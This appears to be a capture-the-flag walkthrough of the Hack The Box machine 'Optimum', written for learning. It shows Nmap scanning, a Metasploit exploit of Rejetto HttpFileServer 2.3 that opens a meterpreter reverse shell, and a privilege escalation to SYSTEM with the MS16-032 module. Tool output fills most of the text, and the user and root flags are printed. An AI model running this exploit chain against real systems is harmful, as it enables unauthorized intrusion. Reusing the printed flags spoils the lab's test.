HTB | Optimum
Walkthrough
Time to Root Machine: ~30min
Write-up Date(s): 4/23/2021
Last Edited: 4/23/2021
Assuming we have connection to HTB's network already, let's go ahead and scan 10.10.10.8's ports with
Nmap:┌──(root💀kali)-[~] └─# nmap -p- -A -T4 10.10.10.8 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 11:25 EDT Nmap scan report for 10.10.10.8 Host is up (0.077s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 49.01 ms 10.10.16.1 2 96.49 ms 10.10.10.8 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 103.43 seconds
Alright, so let's take a look at some important information from the scan. For one thing, we can point out
port 80 [http]. The version of the HTTP server is also listed, which is HttpFileServer httpd 2.3.Let's go ahead and use a browser to view what the HTTP server is serving up:
As the scan suggests, a
Browser-based File Server is being displayed when viewing within a browser. We can see that the server information [version] is consistent with the scan, as well. Now that we confirmed the server version, let's see if we can find any quick exploits for this server version:┌──(root💀kali)-[~] └─# searchsploit httpfileserver 2.3 ------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------ --------------------------------- Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py ------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results
Awesome! So, it looks like we have a potential RCE [Remote Code Execution] exploit, and there's a Metasploit module that we can use with it [found via quick Google search]. Let's spin up
Metasploit Framework [msfconsole] and see if this exploit is affective towards the server:┌──(root💀kali)-[~]
└─# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v6.0.41-dev ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Enable verbose logging with set VERBOSE
true
msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local
machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.16.169:4444
[*] Using URL: http://0.0.0.0:8080/U8QpZnFmvLnu
[*] Local IP: http://10.0.2.15:8080/U8QpZnFmvLnu
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /U8QpZnFmvLnu
[*] Sending stage (175174 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\jEkMo.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.169:4444 -> 10.10.10.8:49162) at 2021-04-28 13:06:19 -0400
[*] Server stopped.
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
Great! We popped a
meterpreter shell using the exploit. We have gathered the servername/username, OPTIMUM/kostas, and basic system information from the meterpreter commands getuid & sysinfo.Being a Windows server, let's start up a windows shell within the meterpreter shell and see how much information we can access with the current user [kostas], and maybe grab the user flag:
C:\Users\kostas\Desktop> dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\kostas\Desktop
05/05/2021 05:09 �� <DIR> .
05/05/2021 05:09 �� <DIR> ..
05/05/2021 05:09 �� <DIR> %TEMP%
18/03/2017 03:11 �� 760.320 hfs.exe
18/03/2017 03:13 �� 32 user.txt.txt
2 File(s) 760.352 bytes
3 Dir(s) 31.895.089.152 bytes free
C:\Users\kostas\Desktop> type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73The user flag,
d0c39409d7b994a9a1389ebf38ef5f73, has been found! Let's navigate more through the system and see if we can get the root flag:C:\Users\kostas\Desktop> cd ../../
cd ../../
C:\Users> dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users
18/03/2017 02:57 �� <DIR> .
18/03/2017 02:57 �� <DIR> ..
18/03/2017 02:52 �� <DIR> Administrator
18/03/2017 02:57 �� <DIR> kostas
22/08/2013 06:39 �� <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 31.895.089.152 bytes free
C:\Users> cd Administrator
cd Administrator
Access is denied.Looks like we got denied access to the
Administrator, which holds the root flag.Alright, since we cannot access the Administrator directory that easily, we will have to use some local privilege escalation techniques in order to get that access. First, we can exit the Windows Shell and background the meterpreter shell. After that, we can try Metasploit's
suggester module and see if we can find a local exploit to escalate those privileges:C:\Users> exit exit meterpreter > background [*] Backgrounding session 1... msf6 exploit(windows/http/rejetto_hfs_exec) > search suggester Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester msf6 exploit(windows/http/rejetto_hfs_exec) > use 0 msf6 post(multi/recon/local_exploit_suggester) > options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf6 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.8 - Collecting local exploits for x86/windows... [*] 10.10.10.8 - 37 exploit checks are being tried... [+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [*] Post module execution completed
After running the suggester module, we have two exploits that could potentially escalate our privileges on this Windows server. Let's grab the
exploit/windows/local/ms16_032_secondary_logon_handle_privesc module and give that one a shot:msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.0.2.15 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows x86 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1 SESSION => 1 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST tun0 LHOST => tun0 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run [*] Started reverse TCP handler on 10.10.16.169:4444 [+] Compressed size: 1016 [!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell [*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\OTCGvsJEVCfEy.ps1... [*] Compressing script contents... [+] Compressed size: 3600 [*] Executing exploit script... __ __ ___ ___ ___ ___ ___ ___ | V | _|_ | | _|___| |_ |_ | | |_ |_| |_| . |___| | |_ | _| |_|_|_|___|_____|___| |___|___|___| [by b33f -> @FuzzySec] [?] Operating system core count: 2 [>] Duplicating CreateProcessWithLogonW handle [?] Done, using thread handle: 2112 [*] Sniffing out privileged impersonation token.. [?] Thread belongs to: svchost [+] Thread suspended [>] Wiping current impersonation token [>] Building SYSTEM impersonation token [?] Success, open SYSTEM token handle: 2088 [+] Resuming thread.. [*] Sniffing out SYSTEM shell.. [>] Duplicating SYSTEM token [>] Starting token race [>] Starting process race [!] Holy handle leak Batman, we have a SYSTEM shell!! njGhibBIKeyyOf447q7zBALrqiXDcVA7 [+] Executed on target machine. [*] Sending stage (175174 bytes) to 10.10.10.8 [*] Meterpreter session 2 opened (10.10.16.169:4444 -> 10.10.10.8:49163) at 2021-04-28 13:42:02 -0400 [+] Deleted C:\Users\kostas\AppData\Local\Temp\OTCGvsJEVCfEy.ps1 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : OPTIMUM OS : Windows 2012 R2 (6.3 Build 9600). Architecture : x64 System Language : el_GR Domain : HTB Logged On Users : 2 Meterpreter : x86/windows
And just like that, we have escalated our local privileges to a Windows Administrator,
NT AUTHORITY\SYSTEM! We can now pop another Windows shell and navigate into the Administrator directory and grab that root flag:C:\Users> cd Administrator
cd Administrator
C:\Users\Administrator> dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\Administrator
18/03/2017 02:52 �� <DIR> .
18/03/2017 02:52 �� <DIR> ..
18/03/2017 02:52 �� <DIR> Contacts
18/03/2017 03:14 �� <DIR> Desktop
18/03/2017 02:52 �� <DIR> Documents
18/03/2017 02:52 �� <DIR> Downloads
18/03/2017 02:52 �� <DIR> Favorites
18/03/2017 02:52 �� <DIR> Links
18/03/2017 02:52 �� <DIR> Music
18/03/2017 02:52 �� <DIR> Pictures
18/03/2017 02:52 �� <DIR> Saved Games
18/03/2017 02:52 �� <DIR> Searches
18/03/2017 02:52 �� <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 31.893.983.232 bytes free
C:\Users\Administrator> cd Desktop
cd Desktop
C:\Users\Administrator\Desktop> dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\Administrator\Desktop
18/03/2017 03:14 �� <DIR> .
18/03/2017 03:14 �� <DIR> ..
18/03/2017 03:14 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 31.893.983.232 bytes free
C:\Users\Administrator\Desktop> type root.txt
type root.txt
51ed1b36553c8461f4552c2e92b3eeedROOT FLAG:
USER [kostas] FLAG:
51ed1b36553c8461f4552c2e92b3eeedUSER [kostas] FLAG:
d0c39409d7b994a9a1389ebf38ef5f73